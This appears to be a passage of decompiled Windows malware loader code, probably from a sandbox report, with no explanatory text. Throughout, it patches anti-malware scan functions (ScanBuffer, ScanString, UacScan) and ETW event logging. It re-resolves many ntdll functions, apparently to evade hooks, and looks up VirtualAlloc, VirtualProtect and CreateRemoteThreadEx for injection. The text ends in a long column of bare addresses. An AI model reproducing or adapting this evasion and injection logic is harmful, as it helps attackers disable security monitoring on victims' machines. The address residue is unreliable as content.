							E02174A98(_t2298 - 0x948, E02174D64( *((intOrPtr*)(_t2298 - 0x94c))));
							_push( *((intOrPtr*)(_t2298 - 0x948)));
							_t1873 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x954, _t1873, 0x218e77c);
							E02174A98(_t2298 - 0x950, E02174D64( *((intOrPtr*)(_t2298 - 0x954))));
							_pop(_t2271); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x950)), _t1809, _t2271, _t2297);
							_t1710 =  *0x2194b94; // 0x850
							_push(_t1710);
							L02188604();
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98(_t2298 - 0x958, E02174D64( *((intOrPtr*)(_t2298 - 0x95c))));
							_push( *((intOrPtr*)(_t2298 - 0x958)));
							_t1874 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x964, _t1874, 0x218e77c);
							E02174A98(_t2298 - 0x960, E02174D64( *((intOrPtr*)(_t2298 - 0x964))));
							_pop(_t2276); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x960)), _t1809, _t2276, _t2297); // executed
						}
					}
				}
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x968, E02174D64( *((intOrPtr*)(_t2298 - 0x96c))));
				_push( *((intOrPtr*)(_t2298 - 0x968)));
				_t1839 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x974, _t1839, 0x218e77c);
				E02174A98(_t2298 - 0x970, E02174D64( *((intOrPtr*)(_t2298 - 0x974))));
				_pop(_t2005); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0x970)), _t1809, _t2005, _t2297); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98(_t2298 - 0x978, E02174D64( *((intOrPtr*)(_t2298 - 0x97c))));
				_push( *((intOrPtr*)(_t2298 - 0x978)));
				_t1840 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x984, _t1840, 0x218e77c);
				E02174A98(_t2298 - 0x980, E02174D64( *((intOrPtr*)(_t2298 - 0x984))));
				_pop(_t2010); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0x980)), _t1809, _t2010, _t2297);
				_t979 =  *0x2194bc0; // 0x0
				E02174CB0(_t979, 0x218e8cc);
				if(_t2308 == 0) {
					_t1460 =  *0x2194bc4; // 0x3e01b48
					E02174CB0(_t1460, 0x218e8cc);
					if(_t2308 != 0) {
						_t1462 =  *0x2194bc8; // 0x0
						E02174CB0(_t1462, 0x218e8cc);
						if(_t2308 != 0) {
							_t1465 = E0217304C(0x38c);
							_push(_t1465);
							L021858FC();
							if(_t1465 == 0) {
								_push(0x218e77c);
								_push( *0x2194bb0);
								_push("ScanBuffer");
								E02174C24();
								E02174A98(_t2298 - 0x988, E02174D64( *((intOrPtr*)(_t2298 - 0x98c))));
								_push( *((intOrPtr*)(_t2298 - 0x988)));
								_t1857 =  *0x2194bb0; // 0x3e01b38
								E02174BB0(_t2298 - 0x994, _t1857, 0x218e77c);
								E02174A98(_t2298 - 0x990, E02174D64( *((intOrPtr*)(_t2298 - 0x994))));
								_pop(_t2192);
								E02183690( *((intOrPtr*)(_t2298 - 0x990)), _t1809, _t2192, _t2297);
							} else {
								E021748F4(0x2194bb8, "5E5CDDEE");
							}
							E02172FC4(0, _t2298 - 0x998);
							_push( *((intOrPtr*)(_t2298 - 0x998)));
							_t1484 = E02174DBC(0x2194b78);
							_pop(_t1485);
							E02183990(_t1485, _t1809, _t1484, _t2297, _t2314);
						}
					}
				}
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98(_t2298 - 0x99c, E02174D64( *((intOrPtr*)(_t2298 - 0x9a0))));
				_push( *((intOrPtr*)(_t2298 - 0x99c)));
				_t1841 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x9a8, _t1841, 0x218e77c);
				E02174A98(_t2298 - 0x9a4, E02174D64( *((intOrPtr*)(_t2298 - 0x9a8))));
				_pop(_t2016); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0x9a4)), _t1809, _t2016, _t2297); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x9ac, E02174D64( *((intOrPtr*)(_t2298 - 0x9b0))));
				_push( *((intOrPtr*)(_t2298 - 0x9ac)));
				_t1842 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x9b8, _t1842, 0x218e77c);
				E02174A98(_t2298 - 0x9b4, E02174D64( *((intOrPtr*)(_t2298 - 0x9b8))));
				_pop(_t2021); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0x9b4)), _t1809, _t2021, _t2297);
				_t1009 =  *0x2194bc8; // 0x0
				E02174CB0(_t1009, 0x218e8cc);
				if(0 == 0) {
					_t1435 =  *0x2194bc0; // 0x0
					E02174CB0(_t1435, 0x218e8cc);
					if(0 != 0) {
						_t1437 =  *0x2194bc4; // 0x3e01b48
						E02174CB0(_t1437, 0x218e8cc);
						if(0 != 0) {
							_t1440 = E0217304C(0x38c);
							_push(_t1440);
							L021858FC();
							if(_t1440 == 0) {
								_push(0x218e77c);
								_push( *0x2194bb0);
								_push("ScanBuffer");
								E02174C24();
								E02174A98(_t2298 - 0x9bc, E02174D64( *((intOrPtr*)(_t2298 - 0x9c0))));
								_push( *((intOrPtr*)(_t2298 - 0x9bc)));
								_t1856 =  *0x2194bb0; // 0x3e01b38
								E02174BB0(_t2298 - 0x9c8, _t1856, 0x218e77c);
								E02174A98(_t2298 - 0x9c4, E02174D64( *((intOrPtr*)(_t2298 - 0x9c8))));
								_pop(_t2184);
								E02183690( *((intOrPtr*)(_t2298 - 0x9c4)), _t1809, _t2184, _t2297);
							} else {
								E021748F4(0x2194bb8, "5E5CDDEE");
							}
							E021848A0(E02174DBC(0x2194b78), _t1809, _t2296, _t2297, _t2314);
						}
					}
				}
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x9cc, E02174D64( *((intOrPtr*)(_t2298 - 0x9d0))));
				_push( *((intOrPtr*)(_t2298 - 0x9cc)));
				_t1843 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x9d8, _t1843, 0x218e77c);
				E02174A98(_t2298 - 0x9d4, E02174D64( *((intOrPtr*)(_t2298 - 0x9d8))));
				_pop(_t2027); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0x9d4)), _t1809, _t2027, _t2297); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("Initialize");
				E02174C24();
				E02174A98(_t2298 - 0x9dc, E02174D64( *((intOrPtr*)(_t2298 - 0x9e0))));
				_push( *((intOrPtr*)(_t2298 - 0x9dc)));
				_t1844 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x9e8, _t1844, 0x218e77c);
				E02174A98(_t2298 - 0x9e4, E02174D64( *((intOrPtr*)(_t2298 - 0x9e8))));
				_pop(_t2032); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0x9e4)), _t1809, _t2032, _t2297); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98(_t2298 - 0x9ec, E02174D64( *((intOrPtr*)(_t2298 - 0x9f0))));
				_push( *((intOrPtr*)(_t2298 - 0x9ec)));
				_t1845 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x9f8, _t1845, 0x218e77c);
				E02174A98(_t2298 - 0x9f4, E02174D64( *((intOrPtr*)(_t2298 - 0x9f8))));
				_pop(_t2037); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0x9f4)), _t1809, _t2037, _t2297); // executed
				E02174A98(_t2298 - 0x9fc, "VirtualProtect");
				_push( *((intOrPtr*)(_t2298 - 0x9fc)));
				E02174A98(_t2298 - 0xa00, "kernel32");
				_pop(_t2040);
				E02183690( *((intOrPtr*)(_t2298 - 0xa00)), _t1809, _t2040, _t2297);
				E02174A98(_t2298 - 0xa04, "VirtualAlloc");
				_push( *((intOrPtr*)(_t2298 - 0xa04)));
				E02174A98(_t2298 - 0xa08, "kernel32");
				_pop(_t2043);
				E02183690( *((intOrPtr*)(_t2298 - 0xa08)), _t1809, _t2043, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0xa0c, E02174D64( *((intOrPtr*)(_t2298 - 0xa10))));
				_push( *((intOrPtr*)(_t2298 - 0xa0c)));
				_t1846 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0xa18, _t1846, 0x218e77c);
				E02174A98(_t2298 - 0xa14, E02174D64( *((intOrPtr*)(_t2298 - 0xa18))));
				_pop(_t2048); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0xa14)), _t1809, _t2048, _t2297); // executed
				E02174A98(_t2298 - 0xa1c, "VirtualProtect");
				_push( *((intOrPtr*)(_t2298 - 0xa1c)));
				E02174A98(_t2298 - 0xa20, "KernelBase");
				_pop(_t2051);
				E02183690( *((intOrPtr*)(_t2298 - 0xa20)), _t1809, _t2051, _t2297);
				E02174A98(_t2298 - 0xa24, "VirtualAlloc");
				_push( *((intOrPtr*)(_t2298 - 0xa24)));
				E02174A98(_t2298 - 0xa28, "KernelBase");
				_pop(_t2054);
				E02183690( *((intOrPtr*)(_t2298 - 0xa28)), _t1809, _t2054, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0xa2c, E02174D64( *((intOrPtr*)(_t2298 - 0xa30))));
				_push( *((intOrPtr*)(_t2298 - 0xa2c)));
				_t1847 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0xa38, _t1847, 0x218e77c);
				E02174A98(_t2298 - 0xa34, E02174D64( *((intOrPtr*)(_t2298 - 0xa38))));
				_pop(_t2059); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0xa34)), _t1809, _t2059, _t2297); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("UacInitialize");
				E02174C24();
				E02174A98(_t2298 - 0xa3c, E02174D64( *((intOrPtr*)(_t2298 - 0xa40))));
				_push( *((intOrPtr*)(_t2298 - 0xa3c)));
				_t1848 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0xa48, _t1848, 0x218e77c);
				E02174A98(_t2298 - 0xa44, E02174D64( *((intOrPtr*)(_t2298 - 0xa48))));
				_pop(_t2064); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0xa44)), _t1809, _t2064, _t2297); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("UacScan");
				E02174C24();
				E02174A98(_t2298 - 0xa4c, E02174D64( *((intOrPtr*)(_t2298 - 0xa50))));
				_push( *((intOrPtr*)(_t2298 - 0xa4c)));
				_t1849 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0xa58, _t1849, 0x218e77c);
				E02174A98(_t2298 - 0xa54, E02174D64( *((intOrPtr*)(_t2298 - 0xa58))));
				_pop(_t2069); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0xa54)), _t1809, _t2069, _t2297); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98(_t2298 - 0xa5c, E02174D64( *((intOrPtr*)(_t2298 - 0xa60))));
				_push( *((intOrPtr*)(_t2298 - 0xa5c)));
				_t1850 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0xa68, _t1850, 0x218e77c);
				E02174A98(_t2298 - 0xa64, E02174D64( *((intOrPtr*)(_t2298 - 0xa68))));
				_pop(_t2074); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0xa64)), _t1809, _t2074, _t2297); // executed
				if(E0217304C(0x38c) != 0xc) {
					E021748F4(0x2194bb8, 0x218ea48);
				} else {
					E021748F4(0x2194bb8, "5E5CDDEE");
				}
				E02174A98(_t2298 - 0xa6c, "CreateRemoteThreadEx ");
				_push( *((intOrPtr*)(_t2298 - 0xa6c)));
				E02174A98(_t2298 - 0xa70, "kernelbase");
				_pop(_t2078);
				E02183690( *((intOrPtr*)(_t2298 - 0xa70)), _t1809, _t2078, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("UacScan");
				E02174C24();
				E02174A98(_t2298 - 0xa74, E02174D64( *((intOrPtr*)(_t2298 - 0xa78))));
				_push( *((intOrPtr*)(_t2298 - 0xa74)));
				_t1851 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0xa80, _t1851, 0x218e77c);
				E02174A98(_t2298 - 0xa7c, E02174D64( *((intOrPtr*)(_t2298 - 0xa80))));
				_pop(_t2083); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0xa7c)), _t1809, _t2083, _t2297); // executed
				E02174A98(_t2298 - 0xa84, "ReportEventA");
				_push( *((intOrPtr*)(_t2298 - 0xa84)));
				E02174A98(_t2298 - 0xa88, "advapi32");
				_pop(_t2086);
				E02183690( *((intOrPtr*)(_t2298 - 0xa88)), _t1809, _t2086, _t2297);
				E02174A98(_t2298 - 0xa8c, "SetEncryptedFileMetadata");
				_push( *((intOrPtr*)(_t2298 - 0xa8c)));
				E02174A98(_t2298 - 0xa90, "advapi32");
				_pop(_t2089);
				E02183690( *((intOrPtr*)(_t2298 - 0xa90)), _t1809, _t2089, _t2297);
				E02174A98(_t2298 - 0xa94, "ReportEventW");
				_push( *((intOrPtr*)(_t2298 - 0xa94)));
				E02174A98(_t2298 - 0xa98, "advapi32");
				_pop(_t2092);
				E02183690( *((intOrPtr*)(_t2298 - 0xa98)), _t1809, _t2092, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98(_t2298 - 0xa9c, E02174D64( *((intOrPtr*)(_t2298 - 0xaa0))));
				_push( *((intOrPtr*)(_t2298 - 0xa9c)));
				_t1852 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0xaa8, _t1852, 0x218e77c);
				E02174A98(_t2298 - 0xaa4, E02174D64( *((intOrPtr*)(_t2298 - 0xaa8))));
				_pop(_t2097); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0xaa4)), _t1809, _t2097, _t2297); // executed
				E02174A98(_t2298 - 0xaac, "LdrGetDllHandle");
				_push( *((intOrPtr*)(_t2298 - 0xaac)));
				_t1214 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xab0, E02174D64(_t1214));
				_pop(_t2100);
				E02183690( *((intOrPtr*)(_t2298 - 0xab0)), _t1809, _t2100, _t2297);
				E02174A98(_t2298 - 0xab4, "NtPrivilegedServiceAuditAlarm");
				_push( *((intOrPtr*)(_t2298 - 0xab4)));
				_t1223 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xab8, E02174D64(_t1223));
				_pop(_t2103);
				E02183690( *((intOrPtr*)(_t2298 - 0xab8)), _t1809, _t2103, _t2297);
				E02174A98(_t2298 - 0xabc, "LdrQueryProcessModuleInformation");
				_push( *((intOrPtr*)(_t2298 - 0xabc)));
				_t1232 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xac0, E02174D64(_t1232));
				_pop(_t2106);
				E02183690( *((intOrPtr*)(_t2298 - 0xac0)), _t1809, _t2106, _t2297);
				E02174A98(_t2298 - 0xac4, "LdrLoadDll");
				_push( *((intOrPtr*)(_t2298 - 0xac4)));
				_t1241 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xac8, E02174D64(_t1241));
				_pop(_t2109);
				E02183690( *((intOrPtr*)(_t2298 - 0xac8)), _t1809, _t2109, _t2297);
				E02174A98(_t2298 - 0xacc, "NtOpenObjectAuditAlarm");
				_push( *((intOrPtr*)(_t2298 - 0xacc)));
				_t1250 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xad0, E02174D64(_t1250));
				_pop(_t2112);
				E02183690( *((intOrPtr*)(_t2298 - 0xad0)), _t1809, _t2112, _t2297);
				E02174A98(_t2298 - 0xad4, "NtPrivilegeObjectAuditAlarm");
				_push( *((intOrPtr*)(_t2298 - 0xad4)));
				_t1259 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xad8, E02174D64(_t1259));
				_pop(_t2115);
				E02183690( *((intOrPtr*)(_t2298 - 0xad8)), _t1809, _t2115, _t2297);
				E02174A98(_t2298 - 0xadc, "NtAccessCheckAndAuditAlarm");
				_push( *((intOrPtr*)(_t2298 - 0xadc)));
				_t1268 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xae0, E02174D64(_t1268));
				_pop(_t2118);
				E02183690( *((intOrPtr*)(_t2298 - 0xae0)), _t1809, _t2118, _t2297);
				E02174A98(_t2298 - 0xae4, "NtAccessCheck");
				_push( *((intOrPtr*)(_t2298 - 0xae4)));
				_t1277 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xae8, E02174D64(_t1277));
				_pop(_t2121);
				E02183690( *((intOrPtr*)(_t2298 - 0xae8)), _t1809, _t2121, _t2297);
				E02174A98(_t2298 - 0xaec, "NtAllocateUuids");
				_push( *((intOrPtr*)(_t2298 - 0xaec)));
				_t1286 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xaf0, E02174D64(_t1286));
				_pop(_t2124);
				E02183690( *((intOrPtr*)(_t2298 - 0xaf0)), _t1809, _t2124, _t2297);
				E02174A98(_t2298 - 0xaf4, "NtPrivilegeCheck");
				_push( *((intOrPtr*)(_t2298 - 0xaf4)));
				_t1295 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xaf8, E02174D64(_t1295));
				_pop(_t2127);
				E02183690( *((intOrPtr*)(_t2298 - 0xaf8)), _t1809, _t2127, _t2297);
				E02174A98(_t2298 - 0xafc, "NtSetSecurityObject");
				_push( *((intOrPtr*)(_t2298 - 0xafc)));
				_t1304 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xb00, E02174D64(_t1304));
				_pop(_t2130);
				E02183690( *((intOrPtr*)(_t2298 - 0xb00)), _t1809, _t2130, _t2297);
				E02174A98(_t2298 - 0xb04, "NtQuerySecurityObject");
				_push( *((intOrPtr*)(_t2298 - 0xb04)));
				_t1313 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xb08, E02174D64(_t1313));
				_pop(_t2133);
				E02183690( *((intOrPtr*)(_t2298 - 0xb08)), _t1809, _t2133, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98(_t2298 - 0xb0c, E02174D64( *((intOrPtr*)(_t2298 - 0xb10))));
				_push( *((intOrPtr*)(_t2298 - 0xb0c)));
				_t1853 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0xb18, _t1853, 0x218e77c);
				E02174A98(_t2298 - 0xb14, E02174D64( *((intOrPtr*)(_t2298 - 0xb18))));
				_pop(_t2138); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0xb14)), _t1809, _t2138, _t2297); // executed
				E02174A98(_t2298 - 0xb1c, "NtCreateSection");
				_push( *((intOrPtr*)(_t2298 - 0xb1c)));
				_t1336 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xb20, E02174D64(_t1336));
				_pop(_t2141);
				E02183690( *((intOrPtr*)(_t2298 - 0xb20)), _t1809, _t2141, _t2297);
				E02174A98(_t2298 - 0xb24, "NtOpenSection");
				_push( *((intOrPtr*)(_t2298 - 0xb24)));
				_t1345 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xb28, E02174D64(_t1345));
				_pop(_t2144);
				E02183690( *((intOrPtr*)(_t2298 - 0xb28)), _t1809, _t2144, _t2297);
				E02174A98(_t2298 - 0xb2c, "NtMapViewOfSection");
				_push( *((intOrPtr*)(_t2298 - 0xb2c)));
				_t1354 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xb30, E02174D64(_t1354));
				_pop(_t2147);
				E02183690( *((intOrPtr*)(_t2298 - 0xb30)), _t1809, _t2147, _t2297);
				E02174A98(_t2298 - 0xb34, "NtCreateFile");
				_push( *((intOrPtr*)(_t2298 - 0xb34)));
				_t1363 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xb38, E02174D64(_t1363));
				_pop(_t2150);
				E02183690( *((intOrPtr*)(_t2298 - 0xb38)), _t1809, _t2150, _t2297);
				E02174A98(_t2298 - 0xb3c, "EtwEventWriteEx");
				_push( *((intOrPtr*)(_t2298 - 0xb3c)));
				_t1372 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xb40, E02174D64(_t1372));
				_pop(_t2153);
				E02183690( *((intOrPtr*)(_t2298 - 0xb40)), _t1809, _t2153, _t2297);
				E02174A98(_t2298 - 0xb44, "NtOpenFile");
				_push( *((intOrPtr*)(_t2298 - 0xb44)));
				_t1381 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xb48, E02174D64(_t1381));
				_pop(_t2156);
				E02183690( *((intOrPtr*)(_t2298 - 0xb48)), _t1809, _t2156, _t2297);
				E02174A98(_t2298 - 0xb4c, "EtwEventWrite");
				_push( *((intOrPtr*)(_t2298 - 0xb4c)));
				_t1390 =  *0x2194bb8; // 0x3e09b08
				E02174A98(_t2298 - 0xb50, E02174D64(_t1390));
				_pop(_t2159);
				E02183690( *((intOrPtr*)(_t2298 - 0xb50)), _t1809, _t2159, _t2297);
				ExitProcess(0); // executed
				_pop(_t2160);
				 *[fs:eax] = _t2160;
				_push(E0218E74C);
				E021748C4(_t2298 - 0xb50, 0x62);
				E021748C4(_t2298 - 0x9c0, 2);
				E021748C4(_t2298 - 0x9c8, 2);
				E021748C4(_t2298 - 0x9b8, 0x61);
				E021748A0(_t2298 - 0x828);
				E021748C4(_t2298 - 0x834, 3);
				E021748C4(_t2298 - 0x724, 0x5e);
				E021748C4(_t2298 - 0x5a8, 3);
				E021748A0(_t2298 - 0x5ac);
				E021748C4(_t2298 - 0x59c, 0x63);
				E021748C4(_t2298 - 0x410, 0x64);
				E021748C4(_t2298 - 0x280, 9);
				_t2171 =  *0x21885d4; // 0x21885d8
				E02175A10(_t2298 - 0x25c, _t2171);
				E021748C4(_t2298 - 0x258, 0x48);
				_t2173 =  *0x21885d4; // 0x21885d8
				E02175A10(_t2298 - 0x138, _t2173);
				E021748C4(_t2298 - 0x134, 0x11);
				E021748C4(_t2298 - 0xf0, 0xd);
				return E021748C4(_t2298 - 0xb8, 0x2e);
			}











































































































































































































                                                                                                0x0218c0d9
                                                                                                0x0218c0d9
                                                                                                0x0218c0d9
                                                                                                0x0218c0d9
                                                                                                0x0218c0d9
                                                                                                0x0218c0de
                                                                                                0x0218c0e4
                                                                                                0x0218c0f4
                                                                                                0x0218c10c
                                                                                                0x0218c117
                                                                                                0x0218c11e
                                                                                                0x0218c129
                                                                                                0x0218c141
                                                                                                0x0218c14c
                                                                                                0x0218c14d
                                                                                                0x0218c152
                                                                                                0x0218c158
                                                                                                0x0218c15d
                                                                                                0x0218c16d
                                                                                                0x0218c184
                                                                                                0x0218c189
                                                                                                0x0218c18e
                                                                                                0x0218c194
                                                                                                0x0218c1a4
                                                                                                0x0218c1bc
                                                                                                0x0218c1c7
                                                                                                0x0218c1ce
                                                                                                0x0218c1d9
                                                                                                0x0218c1f1
                                                                                                0x0218c1fc
                                                                                                0x0218c1fd
                                                                                                0x0218c202
                                                                                                0x0218c207
                                                                                                0x0218c20d
                                                                                                0x0218c21d
                                                                                                0x0218c235
                                                                                                0x0218c240
                                                                                                0x0218c247
                                                                                                0x0218c252
                                                                                                0x0218c26a
                                                                                                0x0218c275
                                                                                                0x0218c276
                                                                                                0x0218c27b
                                                                                                0x0218c280
                                                                                                0x0218c286
                                                                                                0x0218c296
                                                                                                0x0218c2ae
                                                                                                0x0218c2b9
                                                                                                0x0218c2c0
                                                                                                0x0218c2cb
                                                                                                0x0218c2e3
                                                                                                0x0218c2ee
                                                                                                0x0218c2ef
                                                                                                0x0218c2f4
                                                                                                0x0218c2fa
                                                                                                0x0218c2ff
                                                                                                0x0218c304
                                                                                                0x0218c309
                                                                                                0x0218c30f
                                                                                                0x0218c31f
                                                                                                0x0218c337
                                                                                                0x0218c342
                                                                                                0x0218c349
                                                                                                0x0218c354
                                                                                                0x0218c36c
                                                                                                0x0218c377
                                                                                                0x0218c378
                                                                                                0x0218c37d
                                                                                                0x0218c382
                                                                                                0x0218c388
                                                                                                0x0218c398
                                                                                                0x0218c3b0
                                                                                                0x0218c3bb
                                                                                                0x0218c3c2
                                                                                                0x0218c3cd
                                                                                                0x0218c3e5
                                                                                                0x0218c3f0
                                                                                                0x0218c3f1
                                                                                                0x0218c3f6
                                                                                                0x0218c3fc
                                                                                                0x0218c401
                                                                                                0x0218c407
                                                                                                0x0218c417
                                                                                                0x0218c42e
                                                                                                0x0218c443
                                                                                                0x0218c453
                                                                                                0x0218c458
                                                                                                0x0218c45d
                                                                                                0x0218c463
                                                                                                0x0218c473
                                                                                                0x0218c48b
                                                                                                0x0218c496
                                                                                                0x0218c49d
                                                                                                0x0218c4a8
                                                                                                0x0218c4c0
                                                                                                0x0218c4cb
                                                                                                0x0218c4cc
                                                                                                0x0218c4d1
                                                                                                0x0218c4d6
                                                                                                0x0218c4dc
                                                                                                0x0218c4ec
                                                                                                0x0218c504
                                                                                                0x0218c50f
                                                                                                0x0218c516
                                                                                                0x0218c521
                                                                                                0x0218c539
                                                                                                0x0218c544
                                                                                                0x0218c545
                                                                                                0x0218c54a
                                                                                                0x0218c550
                                                                                                0x0218c555
                                                                                                0x0218c55a
                                                                                                0x0218c55f
                                                                                                0x0218c565
                                                                                                0x0218c575
                                                                                                0x0218c58d
                                                                                                0x0218c598
                                                                                                0x0218c59f
                                                                                                0x0218c5aa
                                                                                                0x0218c5c2
                                                                                                0x0218c5cd
                                                                                                0x0218c5ce
                                                                                                0x0218c5d3
                                                                                                0x0218c5d8
                                                                                                0x0218c5de
                                                                                                0x0218c5ee
                                                                                                0x0218c606
                                                                                                0x0218c611
                                                                                                0x0218c618
                                                                                                0x0218c623
                                                                                                0x0218c63b
                                                                                                0x0218c646
                                                                                                0x0218c647
                                                                                                0x0218c64c
                                                                                                0x0218c651
                                                                                                0x0218c657
                                                                                                0x0218c667
                                                                                                0x0218c67f
                                                                                                0x0218c68a
                                                                                                0x0218c691
                                                                                                0x0218c69c
                                                                                                0x0218c6b4
                                                                                                0x0218c6bf
                                                                                                0x0218c6c0
                                                                                                0x0218c6c5
                                                                                                0x0218c6cb
                                                                                                0x0218c6d0
                                                                                                0x0218c6e0
                                                                                                0x0218c6f7
                                                                                                0x0218c6fc
                                                                                                0x0218c701
                                                                                                0x0218c707
                                                                                                0x0218c717
                                                                                                0x0218c72f
                                                                                                0x0218c73a
                                                                                                0x0218c741
                                                                                                0x0218c74c
                                                                                                0x0218c764
                                                                                                0x0218c76f
                                                                                                0x0218c770
                                                                                                0x0218c775
                                                                                                0x0218c77a
                                                                                                0x0218c780
                                                                                                0x0218c790
                                                                                                0x0218c7a8
                                                                                                0x0218c7b3
                                                                                                0x0218c7ba
                                                                                                0x0218c7c5
                                                                                                0x0218c7dd
                                                                                                0x0218c7e8
                                                                                                0x0218c7e9
                                                                                                0x0218c7ee
                                                                                                0x0218c7f4
                                                                                                0x0218c7f9
                                                                                                0x0218c7fe
                                                                                                0x0218c803
                                                                                                0x0218c809
                                                                                                0x0218c819
                                                                                                0x0218c831
                                                                                                0x0218c83c
                                                                                                0x0218c843
                                                                                                0x0218c84e
                                                                                                0x0218c866
                                                                                                0x0218c871
                                                                                                0x0218c872
                                                                                                0x0218c877
                                                                                                0x0218c87c
                                                                                                0x0218c882
                                                                                                0x0218c892
                                                                                                0x0218c8aa
                                                                                                0x0218c8b5
                                                                                                0x0218c8bc
                                                                                                0x0218c8c7
                                                                                                0x0218c8df
                                                                                                0x0218c8ea
                                                                                                0x0218c8eb
                                                                                                0x0218c8f0
                                                                                                0x0218c8f6
                                                                                                0x0218c8fb
                                                                                                0x0218c90b
                                                                                                0x0218c922
                                                                                                0x0218c937
                                                                                                0x0218c947
                                                                                                0x0218c94c
                                                                                                0x0218c951
                                                                                                0x0218c957
                                                                                                0x0218c967
                                                                                                0x0218c97f
                                                                                                0x0218c98a
                                                                                                0x0218c991
                                                                                                0x0218c99c
                                                                                                0x0218c9b4
                                                                                                0x0218c9bf
                                                                                                0x0218c9c0
                                                                                                0x0218c9c5
                                                                                                0x0218c9ca
                                                                                                0x0218c9d0
                                                                                                0x0218c9e0
                                                                                                0x0218c9f8
                                                                                                0x0218ca03
                                                                                                0x0218ca0a
                                                                                                0x0218ca15
                                                                                                0x0218ca2d
                                                                                                0x0218ca38
                                                                                                0x0218ca39
                                                                                                0x0218ca3e
                                                                                                0x0218ca44
                                                                                                0x0218ca49
                                                                                                0x0218ca4e
                                                                                                0x0218ca53
                                                                                                0x0218ca59
                                                                                                0x0218ca69
                                                                                                0x0218ca81
                                                                                                0x0218ca8c
                                                                                                0x0218ca93
                                                                                                0x0218ca9e
                                                                                                0x0218cab6
                                                                                                0x0218cac1
                                                                                                0x0218cac2
                                                                                                0x0218cac7
                                                                                                0x0218cacc
                                                                                                0x0218cad2
                                                                                                0x0218cae2
                                                                                                0x0218cafa
                                                                                                0x0218cb05
                                                                                                0x0218cb0c
                                                                                                0x0218cb17
